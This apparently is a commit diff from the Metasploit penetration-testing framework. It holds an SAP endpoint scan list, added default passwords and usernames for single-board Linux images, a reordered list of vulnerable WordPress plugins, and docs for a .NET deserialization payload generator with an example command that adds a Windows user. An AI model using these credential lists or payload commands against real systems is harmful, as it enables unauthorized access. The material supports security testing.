sap/bc/webdynpro/sap/WDR_DOCU_HELPER
sap/bc/webdynpro/sap/WDR_MESSAGE_AREA
sap/bc/webdynpro/sap/WDR_TEST_ADOBE
sap/bc/webdynpro/sap/WDR_TEST_DDIC_SHLP
sap/bc/webdynpro/sap/WDR_TEST_DOCU
sap/bc/webdynpro/sap/WDR_TEST_EVENTS
sap/bc/webdynpro/sap/WDR_TEST_ICON_SOURCES
sap/bc/webdynpro/sap/WDR_TEST_IT05
sap/bc/webdynpro/sap/WDR_TEST_JNDI_PROVIDER
sap/bc/webdynpro/sap/WDR_TEST_LAYOUTS
sap/bc/webdynpro/sap/WDR_TEST_MODIFY_VIEW
sap/bc/webdynpro/sap/WDR_TEST_NAVIGATION
sap/bc/webdynpro/sap/WDR_TEST_OVS
sap/bc/webdynpro/sap/WDR_TEST_P00001
sap/bc/webdynpro/sap/WDR_TEST_P00002
sap/bc/webdynpro/sap/WDR_TEST_P00003
sap/bc/webdynpro/sap/WDR_TEST_P13N
sap/bc/webdynpro/sap/WDR_TEST_POPUPS
sap/bc/webdynpro/sap/WDR_TEST_POPUPS_RT
sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_FIRE
sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_FIRE2
sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_FIRE_POP
sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_REC
sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_REC2
sap/bc/webdynpro/sap/WDR_TEST_PORTAL_EVENT_REC_POP
sap/bc/webdynpro/sap/WDR_TEST_PORTAL_NAV_OBN
sap/bc/webdynpro/sap/WDR_TEST_PORTAL_NAV_PAGE
sap/bc/webdynpro/sap/WDR_TEST_PORTAL_NAV_TARGET
sap/bc/webdynpro/sap/WDR_TEST_PORTAL_OBN_POPUP
sap/bc/webdynpro/sap/WDR_TEST_PORTAL_OBN_WS
sap/bc/webdynpro/sap/WDR_TEST_PORTAL_OBN_WS_IN
sap/bc/webdynpro/sap/WDR_TEST_PORTAL_WORKPROTECT
sap/bc/webdynpro/sap/WDR_TEST_RUNTIME
sap/bc/webdynpro/sap/WDR_TEST_TABLE
sap/bc/webdynpro/sap/WDR_TEST_WINDOW_CHILD
sap/bc/webdynpro/sap/WDR_TEST_WINDOW_CLOSE
sap/bc/webdynpro/sap/WDR_TEST_WINDOW_ERROR
sap/bc/webdynpro/sap/WDR_TEST_WINDOW_LOGOFF
sap/bc/webdynpro/sap/WDR_TEST_WINDOW_RESUME
sap/bc/webdynpro/sap/WDR_TEST_WINDOW_SUITE
sap/bc/webdynpro/sap/WDR_TEST_WINDOW_SUSRES_A
sap/bc/webdynpro/sap/WDR_TEST_WINDOW_SUSRES_B
sap/bc/webdynpro/sap/WDR_UIE_LIBRARY
sap/bc/webdynpro/sap/apb_launchpad
sap/bc/webdynpro/sap/apb_launchpad_nwbc
sap/bc/webdynpro/sap/apb_lpd_light_start
sap/bc/webdynpro/sap/apb_lpd_start_url
sap/bc/webdynpro/sap/appl_log_trc_viewer
sap/bc/webdynpro/sap/appl_soap_management
sap/bc/webdynpro/sap/application_exit
sap/bc/webdynpro/sap/ccmsbi_wast_extr_testenv
sap/bc/webdynpro/sap/cnp_light_test
sap/bc/webdynpro/sap/configure_application
sap/bc/webdynpro/sap/configure_component
sap/bc/webdynpro/sap/demo_messages
sap/bc/webdynpro/sap/demo_messages2
sap/bc/webdynpro/sap/demo_variable_dropdown
sap/bc/webdynpro/sap/demo_wda_quiz
sap/bc/webdynpro/sap/demo_wda_table
sap/bc/webdynpro/sap/esh_adm_smoketest_ui
sap/bc/webdynpro/sap/esh_admin_ui_component
sap/bc/webdynpro/sap/esh_eng_modelling
sap/bc/webdynpro/sap/esh_search_results.ui
sap/bc/webdynpro/sap/ios_test_helloworld_ms
sap/bc/webdynpro/sap/ios_test_helloworld_so
sap/bc/webdynpro/sap/ios_test_simple_ms
sap/bc/webdynpro/sap/ios_test_simple_so
sap/bc/webdynpro/sap/its
sap/bc/webdynpro/sap/powl_test_feeder
sap/bc/webdynpro/sap/ptm_assign_s_ui
sap/bc/webdynpro/sap/ptm_jf_worklist_ui
sap/bc/webdynpro/sap/ptm_maintain_jf_ui
sap/bc/webdynpro/sap/rcm_multistring_edit_example
sap/bc/webdynpro/sap/rcm_poid_info_example
sap/bc/webdynpro/sap/rcm_property_query_example
sap/bc/webdynpro/sap/salv_wd_demo_table_dfault
sap/bc/webdynpro/sap/salv_wd_submit
sap/bc/webdynpro/sap/salv_wd_test_col_field
sap/bc/webdynpro/sap/salv_wd_test_conf_caller
sap/bc/webdynpro/sap/salv_wd_test_config1
sap/bc/webdynpro/sap/salv_wd_test_config_api
sap/bc/webdynpro/sap/salv_wd_test_config_api2
sap/bc/webdynpro/sap/salv_wd_test_datatypes
sap/bc/webdynpro/sap/salv_wd_test_dyn1
sap/bc/webdynpro/sap/salv_wd_test_extended
sap/bc/webdynpro/sap/salv_wd_test_file_upload
sap/bc/webdynpro/sap/salv_wd_test_image1
sap/bc/webdynpro/sap/salv_wd_test_modif1
sap/bc/webdynpro/sap/salv_wd_test_no_ddic
sap/bc/webdynpro/sap/salv_wd_test_non_portal
sap/bc/webdynpro/sap/salv_wd_test_set_data
sap/bc/webdynpro/sap/salv_wd_test_set_data1
sap/bc/webdynpro/sap/salv_wd_test_simple1
sap/bc/webdynpro/sap/salv_wd_test_table_edit2
sap/bc/webdynpro/sap/salv_wd_test_table_f4
sap/bc/webdynpro/sap/salv_wd_test_table_tol
sap/bc/webdynpro/sap/salv_wd_test_table_tol2
sap/bc/webdynpro/sap/salv_wd_test_translation
sap/bc/webdynpro/sap/sh_adm_smoketest_files
sap/bc/webdynpro/sap/test_ddic
sap/bc/webdynpro/sap/wd_analyze_config_appl
sap/bc/webdynpro/sap/wd_analyze_config_comp
sap/bc/webdynpro/sap/wd_analyze_config_default
sap/bc/webdynpro/sap/wd_analyze_config_user
sap/bc/webdynpro/sap/wd_layout_cnp_light
sap/bc/webdynpro/sap/wd_personalize_ddic_valuehelp
sap/bc/webdynpro/sap/wd_tut_alv
sap/bc/webdynpro/sap/wd_tut_componentdetail
sap/bc/webdynpro/sap/wd_tut_componentusage
sap/bc/webdynpro/sap/wd_tut_dialogboxes
sap/bc/webdynpro/sap/wdhc_application
sap/bc/webdynpro/sap/wdk_gaf_template
sap/bc/webdynpro/sap/wdk_oif_template
sap/bc/webdynpro/sap/wdk_qaf_template
sap/bc/webdynpro/sap/wdr_inplace_demo1
sap/bc/webdynpro/sap/wdr_inplace_demo2
sap/bc/webdynpro/sap/wdr_ovs_test
sap/bc/webdynpro/sap/wdr_package_srvs
sap/bc/webdynpro/sap/wdr_popup_to_confirm_test
sap/bc/webdynpro/sap/wdr_replace_if_wdl
sap/bc/webdynpro/sap/wdr_test_adobe_pdf_only
sap/bc/webdynpro/sap/wdr_test_appl_def_vh
sap/bc/webdynpro/sap/wdr_test_application_api
sap/bc/webdynpro/sap/wdr_test_bg_blend
sap/bc/webdynpro/sap/wdr_test_chat
sap/bc/webdynpro/sap/wdr_test_cmp_usage_group
sap/bc/webdynpro/sap/wdr_test_cmpusage
sap/bc/webdynpro/sap/wdr_test_cmpusage4
sap/bc/webdynpro/sap/wdr_test_config
sap/bc/webdynpro/sap/wdr_test_config2
sap/bc/webdynpro/sap/wdr_test_configmain
sap/bc/webdynpro/sap/wdr_test_context
sap/bc/webdynpro/sap/wdr_test_dynamic
sap/bc/webdynpro/sap/wdr_test_enhancements
sap/bc/webdynpro/sap/wdr_test_exit_plug
sap/bc/webdynpro/sap/wdr_test_ext_mapping
sap/bc/webdynpro/sap/wdr_test_extended_path
sap/bc/webdynpro/sap/wdr_test_gantt
sap/bc/webdynpro/sap/wdr_test_global_settings
sap/bc/webdynpro/sap/wdr_test_help
sap/bc/webdynpro/sap/wdr_test_input
sap/bc/webdynpro/sap/wdr_test_it05_nopatt
sap/bc/webdynpro/sap/wdr_test_mailto
sap/bc/webdynpro/sap/wdr_test_mandatory
sap/bc/webdynpro/sap/wdr_test_misc
sap/bc/webdynpro/sap/wdr_test_msg_manager_00
sap/bc/webdynpro/sap/wdr_test_navigation6
sap/bc/webdynpro/sap/wdr_test_navigation7
sap/bc/webdynpro/sap/wdr_test_navigation_00
sap/bc/webdynpro/sap/wdr_test_ovs2
sap/bc/webdynpro/sap/wdr_test_p00004
sap/bc/webdynpro/sap/wdr_test_p00006
sap/bc/webdynpro/sap/wdr_test_p00007
sap/bc/webdynpro/sap/wdr_test_p00008
sap/bc/webdynpro/sap/wdr_test_p00009
sap/bc/webdynpro/sap/wdr_test_p00010
sap/bc/webdynpro/sap/wdr_test_p00011
sap/bc/webdynpro/sap/wdr_test_paddless_window
sap/bc/webdynpro/sap/wdr_test_pers_imp
sap/bc/webdynpro/sap/wdr_test_pers_imp_exp
sap/bc/webdynpro/sap/wdr_test_popup_01
sap/bc/webdynpro/sap/wdr_test_popup_inplug
sap/bc/webdynpro/sap/wdr_test_popup_to_confirm
sap/bc/webdynpro/sap/wdr_test_popups_rt
sap/bc/webdynpro/sap/wdr_test_popups_rt_00
sap/bc/webdynpro/sap/wdr_test_select_options
sap/bc/webdynpro/sap/wdr_test_ui_elements
sap/bc/webdynpro/sap/wdr_test_ur_browser
sap/bc/webdynpro/sap/wdr_transport_srvs
sap/bc/webdynpro/sap/wdt_alv
sap/bc/webdynpro/sap/wdt_bg_scatter
sap/bc/webdynpro/sap/wdt_componentdetail
sap/bc/webdynpro/sap/wdt_componentusage
sap/bc/webdynpro/sap/wdt_dialogboxes
sap/bc/webdynpro/sap/wdt_ext_map_reuse
sap/bc/webdynpro/sap/wdt_flightlist
sap/bc/webdynpro/sap/wdt_master_detail
sap/bc/webdynpro/sap/wdt_quiz
sap/bc/webdynpro/sap/wdt_table
sap/bc/webdynpro/sap/wdt_tree
sap/bc/webdynpro/sap/wdt_tree_table_by_key
sap/bc/webflow
sap/bc/webflow/
sap/bc/webflow/demo
sap/bc/webflow/demo/
sap/bc/webflow/demo/trareq_update
sap/bc/webflow/demo/wf_demo_calc_01
sap/bc/webflow/test
sap/bc/webflow/test/
sap/bc/webflow/test/get_data
sap/bc/webflow/test/inc_async
sap/bc/webflow/test/inc_sync
sap/bc/webflow/test/test_datatypes
sap/bc/webflow/test/test_get_xml
sap/bc/webflow/test/test_show_xml
sap/bc/webflow/wshandler
sap/bc/webrfc
sap/bc/workflow
sap/bc/workflow/
sap/bc/workflow/shortcut
sap/bc/workflow/workflow_api
sap/bc/workflow_xml
sap/bc/xmb
sap/bc/xml
sap/bc/xmsmsg
sap/bc/xrfc
sap/bc/xrfc_test
sap/bw
sap/ca
sap/ca/att_provide
sap/crm
sap/es/cockpit
sap/es/getdocument
sap/es/opensearch
sap/es/opensearch/description
sap/es/opensearch/list
sap/es/opensearch/search
sap/es/redirect
sap/es/saplink
sap/es/search
sap/icm/admin
sap/meData
sap/monitoring
sap/monitoring/
sap/monitoring/ComponentInfo
sap/monitoring/SystemInfo
sap/option
sap/public
sap/public/
sap/public/bc
sap/public/bc/
sap/public/bc/NWDEMO_MODEL
sap/public/bc/NW_ESH_TST_AUTO
sap/public/bc/icons
sap/public/bc/icons_rtl
sap/public/bc/its
sap/public/bc/its/
sap/public/bc/its/designs
sap/public/bc/its/mimes
sap/public/bc/its/mimes/system/SL/page/hourglass.html
sap/public/bc/its/mobile/itsmobile00
sap/public/bc/its/mobile/itsmobile01
sap/public/bc/its/mobile/rfid
sap/public/bc/its/mobile/start
sap/public/bc/its/mobile/test
sap/public/bc/pictograms
sap/public/bc/sicf_login_run
sap/public/bc/trex
sap/public/bc/ur
sap/public/bc/wdtracetool
sap/public/bc/webdynpro
sap/public/bc/webdynpro/
sap/public/bc/webdynpro/ViewDesigner
sap/public/bc/webdynpro/adobeChallenge
sap/public/bc/webdynpro/adobechallenge
sap/public/bc/webdynpro/mimes
sap/public/bc/webdynpro/ssr
sap/public/bc/webdynpro/viewdesigner
sap/public/bc/webicons
sap/public/bc/workflow
sap/public/bc/workflow/shortcut
sap/public/bsp
sap/public/bsp/sap
sap/public/bsp/sap/
sap/public/bsp/sap/htmlb
sap/public/bsp/sap/public
sap/public/bsp/sap/public/
sap/public/bsp/sap/public/ISE
sap/public/bsp/sap/public/bc
sap/public/bsp/sap/public/faa
sap/public/bsp/sap/public/graphics
sap/public/bsp/sap/public/graphics/
sap/public/bsp/sap/public/graphics/jnet_handler
sap/public/bsp/sap/public/graphics/mimes
sap/public/bsp/sap/system
sap/public/bsp/sap/system_public
sap/public/icf_check
sap/public/icf_info
sap/public/icf_info/
sap/public/icf_info/icr_groups
sap/public/icf_info/icr_urlprefix
sap/public/icf_info/logon_groups
sap/public/icf_info/urlprefix
sap/public/icman
sap/public/info
sap/public/myssocntl
sap/public/ping
sap/wdvd
sap/webcuif
sap/webdynpro/sap/hap_main_document
sap/webdynpro/sap/hap_start_page_powl_ui_ess
sap/webdynpro/sap/hap_store_page_powl_ui_mss
sap/webdynpro/sap/hrtmc_employee_profile
sap/webdynpro/sap/hrtmc_rm_maintenance
sap/webdynpro/sap/hrtmc_ta_assessment
sap/webdynpro/sap/hrtmc_ta_dashboard
sap/webdynpro/sap/wd_analyze_config_user
sap/xi
sap/xi/
sap/xi/adapter_plain
sap/xi/cache
sap/xi/cache_gui
sap/xi/cache_gui_ssl
sap/xi/cache_ssl
sap/xi/docu_apperror
sap/xi/docu_syserror
sap/xi/engine
sap/xi/engine_test
sap/xi/simulation
sap/xml/
sap/xml/cwm
sap/xml/soap
sap/xml/soap/xmla
sap/xml/soap/xmla/fault
sap_java
sap_java/bc
sapmc
sapmc/sapmc.html
sapse/startsld
servlet/com.sap.admin.Critical.Actio
sim/
sim/config/testdata.jsp
sim/config/testerror.jsp
sim/index.html
sld
slm
slmServices/config
slmServices/config?wsdl
slmSolManServices/Config1
socoview
socoview/flddisplay.asp
sp
spml
sysconfig
tc.lm.webadmin.endtoend.public.app
tc/lm/webadmin/clusteradmin
teched/test
test30
top.html
uddi
uddiclient
uddiclient/jsps/index.jsp
useradmin
useradmin/index.jsp
userhome/
utl
vscantest
vscantest/
webdynpro
webdynpro/dispatcher
webdynpro/dispatcher/sap.com/grc~accvwdcomp
webdynpro/dispatcher/sap.com/grc~aewebquery
webdynpro/dispatcher/sap.com/grc~ccappcomp
webdynpro/dispatcher/sap.com/grc~ccxsysbe
webdynpro/dispatcher/sap.com/grc~ccxsysbehr
webdynpro/dispatcher/sap.com/grc~ffappcomp
webdynpro/dispatcher/sap.com/pb/pagebuilder
webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui
webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwl
webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldetail
webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldisplayhistory
webdynpro/dispatcher/sap.com/tc~lm~webadmin~mainframe~wd/WebAdminApp
webdynpro/dispatcher/sap.com/tc~sec~ume~wd~enduser/UmeEnduserApp
webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/Welcome.jsp
webdynpro/dispatcher/sap.com/tc~wd~tools
webdynpro/dispatcher/sap.com/tc~wd~tools/Explorer
webdynpro/dispatcher/sap.com/tc~wd~tools/WebDynproConsole
webdynpro/dispatcher/sap.com/tc~wd~tools/explorer
webdynpro/dispatcher/virsa/ccappcomp/ComplianceCalibrator
webdynpro/resources/sap.com/
webdynpro/welcome
webdynpro/welcome/Welcome.jsp
wsd2wsdl
wsnavigator
wsnavigator/enterwsdl.html
wsnavigator/jsps/redirect.jsp
wsnavigator/jsps/sendrequest.jsp
wsnavigator/jsps/test.jsp
wssproc/cert
wssproc/plain
wssproc/ssl
+12
View File
@@ -1007,3 +1007,15 @@ arcsight
MargaretThatcheris110%SEXY
karaf
vagrant
1234
milkv
luckfox
orangepi
temppwd
bianbu
debian
starfive
linaro
rock
radxa
ubuntu
+7
View File
@@ -28,6 +28,7 @@ cups-pk-helper
daemon
dbadmin
dbus
debian
Debian-exim
Debian-snmp
demo
@@ -65,6 +66,7 @@ landscape
libstoragemgmt
libuuid
lightdm
linaro
list
listen
lp
@@ -95,6 +97,7 @@ operator
oracle
OutOfBox
pi
pico
polkitd
pollinate
popr
@@ -104,9 +107,12 @@ postmaster
printer
proxy
pulse
radxa
redsocks
rfindd
riscv
rje
rock
root
ROOT
rooty
@@ -143,6 +149,7 @@ systemd-timesync
tcpdump
trouble
tss
ubuntu
udadmin
ultra
umountfs
+62 -55
View File
@@ -1,63 +1,70 @@
wordpress-popular-posts
backup
catch-themes-demo-import
modern-events-calendar-lite
ninja-forms
simple-file-list
sp-client-document-manager
drag-and-drop-multiple-file-upload-contact-form-7
wp-file-manager
duplicator
work-the-flow-file-upload
ajax-load-more
wpdiscuz
wptouch
front-end-editor
wpshop
plainview-activity-monitor
sexy-contact-form
all-in-one-wp-migration
backup
backup-backup
boldgrid-backup
bookingpress
bulletproof-security
catch-themes-demo-import
chopslider
custom-registration-form-builder-with-submission-manager
download-manager
drag-and-drop-multiple-file-upload-contact-form-7
dukapress
duplicator
duplicator_download
easy-wp-smtp
elementor
email-subscribers
file-manager-advanced-shortcode
front-end-editor
gi-media-library
give
hash-form
inboundio-marketing
wp-mobile-detector
website-contact-form-with-file-upload
slideshow-gallery
reflex-gallery
wp-symposium
learnpress
loginizer
masterstudy-lms-learning-management-system
modern-events-calendar-lite
modern-events-calendar-lite
nextgen-gallery
ninja-forms
paid-memberships-pro
perfect-survey
photo-gallery
pie-register
wysija-newsletters
dzs-zoomsounds
all-in-one-wp-migration
wp-ultimate-csv-importer
wp-symposium
masterstudy-lms-learning-management-system
wp-gdpr-compliance
plainview-activity-monitor
post-smtp
really-simple-ssl
reflex-gallery
royal-elementor-addons
secure-copy-content-protection
sexy-contact-form
simple-backup
simple-file-list
slideshow-gallery
sp-client-document-manager
subscribe-to-comments
ultimate-member
website-contact-form-with-file-upload
woocommerce-abandoned-cart
woocommerce-payments
wordpress-mobile-pack
wordpress-popular-posts
work-the-flow-file-upload
wp-automatic
wp-easycart
dukapress
loginizer
email-subscribers
wps-hide-login
secure-copy-content-protection
wordpress-mobile-pack
learnpress
wp-fastest-cache
wp-file-manager
wp-gdpr-compliance
wp-mobile-detector
wp-mobile-edition
boldgrid-backup
modern-events-calendar-lite
gi-media-library
chopslider
bulletproof-security
nextgen-gallery
simple-backup
subscribe-to-comments
easy-wp-smtp
duplicator_download
custom-registration-form-builder-with-submission-manager
woocommerce-abandoned-cart
elementor
bookingpress
paid-memberships-pro
woocommerce-payments
file-manager-advanced-shortcode
royal-elementor-addons
backup-backup
wp-symposium
wp-symposium
wp-time-capsule
wp-ultimate-csv-importer
wpdiscuz
wps-hide-login
wpshop
wptouch
wysija-newsletters
+1
View File
@@ -1,2 +1,3 @@
bricks
holding_pattern
wplms
File diff suppressed because it is too large Load Diff
File diff suppressed because it is too large Load Diff
+10 -2
View File
@@ -1,2 +1,10 @@
Contains `modules_metadata_base.json` which contains information about all modules within Metasploit, as well as
`schema.rb` which describes current state of the database schema maintained by Rails ActiveRecord.
This directory contains the following files:
- `modules_metadata_base.json`, which contains information about all modules within Metasploit.
- `schema.rb`, which is auto-generated from the current state of the database schema maintained by Rails ActiveRecord.
This file is auto-generated from the current state of the database.
`schema.rb` is the source Rails uses to define your schema when running `bin/rails db:schema:load`. When creating a new
database, `bin/rails db:schema:load` tends to be faster and is potentially less error-prone than running all of your
migrations from scratch. Old migrations may fail to apply correctly if those migrations use external dependencies or
application code. We _strongly_ recommend that you check this file into your version control system.
+16949 -2881
View File
File diff suppressed because it is too large Load Diff
-2
View File
@@ -1,5 +1,3 @@
version: '3'
services:
ms:
build:
-1
View File
@@ -1,4 +1,3 @@
version: '3'
services:
ms:
image: metasploitframework/metasploit-framework:latest
+2 -2
View File
@@ -23,8 +23,8 @@ PARAMS="$@"
if [[ $PARAMS == *"--rebuild"* ]]; then
echo "Rebuilding image"
docker-compose build
docker compose build
exit $?
fi
docker-compose run --rm --service-ports -e MSF_UID=$(id -u) -e MSF_GID=$(id -g) ms ./msfconsole -r docker/msfconsole.rc "$PARAMS"
docker compose run --rm --service-ports -e MSF_UID=$(id -u) -e MSF_GID=$(id -g) ms ./msfconsole -r docker/msfconsole.rc "$PARAMS"
+1 -1
View File
@@ -1 +1 @@
3.0.5
3.2.5
+1
View File
@@ -6,6 +6,7 @@ gem 'just-the-docs', github: 'rapid7/just-the-docs', branch: 'r7_ver_custom'
#gem 'just-the-docs', path: '../../just-the-docs'
gem 'webrick'
gem 'rexml'
gem 'jekyll-sass-converter', '~> 2.2.0'
group :jekyll_plugins do
gem 'jekyll-sitemap'
+21 -20
View File
@@ -12,22 +12,22 @@ GIT
GEM
remote: https://rubygems.org/
specs:
addressable (2.8.1)
public_suffix (>= 2.0.2, < 6.0)
addressable (2.8.7)
public_suffix (>= 2.0.2, < 7.0)
byebug (11.1.3)
coderay (1.1.3)
colorator (1.1.0)
concurrent-ruby (1.1.10)
concurrent-ruby (1.3.4)
em-websocket (0.5.3)
eventmachine (>= 0.12.9)
http_parser.rb (~> 0)
eventmachine (1.2.7)
ffi (1.15.5)
ffi (1.17.0)
forwardable-extended (2.6.0)
http_parser.rb (0.8.0)
i18n (1.12.0)
i18n (1.14.6)
concurrent-ruby (~> 1.0)
jekyll (4.3.1)
jekyll (4.3.4)
addressable (~> 2.4)
colorator (~> 1.0)
em-websocket (~> 0.5)
@@ -53,44 +53,45 @@ GEM
jekyll (>= 3.7, < 5.0)
jekyll-watch (2.2.1)
listen (~> 3.0)
kramdown (2.4.0)
rexml
kramdown (2.5.1)
rexml (>= 3.3.9)
kramdown-parser-gfm (1.1.0)
kramdown (~> 2.0)
liquid (4.0.3)
listen (3.7.1)
liquid (4.0.4)
listen (3.9.0)
rb-fsevent (~> 0.10, >= 0.10.3)
rb-inotify (~> 0.9, >= 0.9.10)
mercenary (0.4.0)
method_source (1.0.0)
method_source (1.1.0)
pathutil (0.16.2)
forwardable-extended (~> 2.6)
pry (0.14.1)
pry (0.14.2)
coderay (~> 1.1)
method_source (~> 1.0)
pry-byebug (3.10.1)
byebug (~> 11.0)
pry (>= 0.13, < 0.15)
public_suffix (5.0.1)
rake (13.0.6)
public_suffix (6.0.1)
rake (13.2.1)
rb-fsevent (0.11.2)
rb-inotify (0.10.1)
rb-inotify (0.11.1)
ffi (~> 1.0)
rexml (3.2.5)
rouge (4.0.0)
rexml (3.4.0)
rouge (4.5.1)
safe_yaml (1.0.5)
sassc (2.4.0)
ffi (~> 1.9)
terminal-table (3.0.2)
unicode-display_width (>= 1.1.1, < 3)
unicode-display_width (2.3.0)
webrick (1.7.0)
unicode-display_width (2.6.0)
webrick (1.9.1)
PLATFORMS
ruby
DEPENDENCIES
jekyll (~> 4.3.0)
jekyll-sass-converter (~> 2.2.0)
jekyll-sitemap
just-the-docs!
pry-byebug
@@ -101,4 +102,4 @@ DEPENDENCIES
webrick
BUNDLED WITH
2.2.22
2.5.10
+1 -1
View File
@@ -32,7 +32,7 @@ exclude:
# just-the-docs config
mermaid_enabled: true
mermaid:
version: "9.2.2"
version: "10.8.0"
heading_anchors: true
aux_links_new_tab: true
aux_links:
@@ -146,7 +146,7 @@ register_options(
], self.class)
```
**8. Neglecting to use send_request_cgi()'s vars_get or vars_get when crafting a POST/GET request**
**8. Neglecting to use send_request_cgi()'s vars_post or vars_get when crafting a POST/GET request**
```ruby
data_post = 'user=jsmith&pass=hello123'
@@ -199,4 +199,4 @@ Metasploit3.new
```ruby
# https://github.com/rapid7/metasploit-framework/issues/3853
datastore['BAD'] = 'This is bad.'
```
```
@@ -342,7 +342,7 @@ The result object now as a `.to_h` method which returns a hash compatible with o
In the case of a success we build some info hashes and call `create_credential`. This is a method found in the metasploit-credential gem under `lib/metasploit/credential/creation.rb` in a mixin called `Metasploit::Credential::Creation`. This mixin is included in the Report mixin, so if your module includes that mixin you'll get these methods for free.
`create_credential` creates a `Metasploit::Credential::Core`. We then take that core, the service data, and merge it with some additional data. This additional data includes the access level, the current time (to update last_attempted_at on the `Metasploit::Credential::Login`), the the status.
`create_credential` creates a `Metasploit::Credential::Core`. We then take that core, the service data, and merge it with some additional data. This additional data includes the access level, the current time (to update last_attempted_at on the `Metasploit::Credential::Login`), the status.
Finally, for a success, we output the result to the console.
@@ -59,6 +59,7 @@ Example:
| CONFIG_CHANGES | Module modifies some config file |
| IOC_IN_LOGS | Module leaves an indicator of compromise in the log(s) |
| ACCOUNT_LOCKOUTS | Module may cause an account to lock out |
| ACCOUNT_LOGOUT | Module may cause an existing valid session to be forced to log out (likely due to restrictions on concurrent sessions)|
| SCREEN_EFFECTS | Module shows something on the screen that a human may notice |
| PHYSICAL_EFFECTS | Module may produce physical effects in hardware (Examples: light, sound, or heat) |
| AUDIO_EFFECTS | Module may cause a noise (Examples: Audio output from the speakers or hardware beeps) |
@@ -70,3 +71,4 @@ Example:
| FIRST_ATTEMPT_FAIL | The module may fail for the first attempt |
| REPEATABLE_SESSION | The module is expected to get a session every time it runs |
| UNRELIABLE_SESSION | The module isn't expected to get a shell reliably (such as only once) |
| EVENT_DEPENDENT | The module may not execute the payload until an external event occurs. For instance, a cron job, machine restart, user interaction within a GUI element, etc |
@@ -82,24 +82,41 @@ Generate a .NET deserialization payload that will execute an operating system
command using the specified gadget chain and formatter.
Available formatters:
* BinaryFormatter
* LosFormatter
* SoapFormatter
* BinaryFormatter
* LosFormatter
* SoapFormatter
Available gadget chains:
* TextFormattingRunProperties
* TypeConfuseDelegate
* WindowsIdentity
* ClaimsPrincipal
* DataSet
* DataSetTypeSpoof
* ObjectDataProvider
* TextFormattingRunProperties
* TypeConfuseDelegate
* WindowsIdentity
Example: ./dot_net.rb -c "net user msf msf /ADD" -f BinaryFormatter -g TextFormattingRunProperties
Available HMAC algorithms: SHA1, HMACSHA256, HMACSHA384, HMACSHA512, MD5
Specific options:
-c, --command <String> The command to run
-f, --formatter <String> The formatter to use (default: BinaryFormatter)
-g, --gadget <String> The gadget chain to use (default: TextFormattingRunProperties)
-o, --output <String> The output format to use (default: raw, see: --list-output-formats)
--list-output-formats List available output formats, for use with --output
-h, --help Show this message
Examples:
./dot_net.rb -c "net user msf msf /ADD" -f BinaryFormatter -g TypeConfuseDelegate -o base64
./dot_net.rb -c "calc.exe" -f LosFormatter -g TextFormattingRunProperties \
--viewstate-validation-key deadbeef --viewstate-validation-algorithm SHA1
General options:
-h, --help Show this message
-c, --command <String> The command to run
-f, --formatter <String> The formatter to use (default: BinaryFormatter)
-g, --gadget <String> The gadget chain to use (default: TextFormattingRunProperties)
-o, --output <String> The output format to use (default: raw, see: --list-output-formats)
--list-output-formats List available output formats, for use with --output
ViewState related options:
--viewstate-generator <String>
The ViewState generator string to use
--viewstate-validation-algorithm <String>
The validation algorithm (default: SHA1, see: Available HMAC algorithms)
--viewstate-validation-key <HexString>
The validationKey from the web.config file
```
The `-g` / `--gadget` option maps to the *gadget_chain* argument for the
@@ -112,6 +112,11 @@ end
* **Reliability** - The Reliability field describes how reliable the session is that gets returned by the exploit, ex: `REPEATABLE_SESSION`, `UNRELIABLE_SESSION`
* **SideEffects** - The SideEffects field describes the side effects cause by the exploit that the user should be aware of, ex: `ARTIFACTS_ON_DISK`, `IOC_IN_LOGS`, `ACCOUNT_LOCKOUTS`.
### Non-required fields
* **Stance** - The types of stances an exploit can take, such as passive or aggressive. Stances indicate whether or not the module triggers the exploit without waiting for one or more conditions to be met (aggressive) or whether it must wait for certain conditions to be satisfied before the exploit can be initiated (passive). Passive exploits usually would wait for interaction from a client or other entity for being able to trigger the vulnerability.
* **Passive** - Either `true` or `false` indicates whether or not the exploit should be run as a background job. If for example you know the vulnerability takes an hour to trigger, setting `Passive` to `true` would be beneficial as it allows the user to continue using msfconsole while waiting for a response from the exploit.
Your exploit should also have a `check` method to support the check command, but this is optional in case it's not possible.
@@ -201,7 +201,7 @@ This data breaks down to the following table:
| MSCash2 | mscash2-hashcat | `$DCC2$10240#tom#e4e938d12fe5974dc42a90120bd9c90f` | hashcat | mscash2 | | auxiliary/analyze/crack_windows |
| MSSQL (2005) | mssql05_toto | `0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908` | toto | mssql05 | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/crack_databases |
| MSSQL | mssql_foo | `0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254` | foo | mssql | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/crack_databases |
| MSSQL (2012) | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16` | Password! | mssql12 | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/crack_databases |
| MSSQL (2012) | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16` | Password1! | mssql12 | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/crack_databases |
| MySQL | mysql_probe | `445ff82636a7ba59` | probe | mysql | auxiliary/scanner/mysql/mysql_hashdump | auxiliary/analyze/crack_databases |
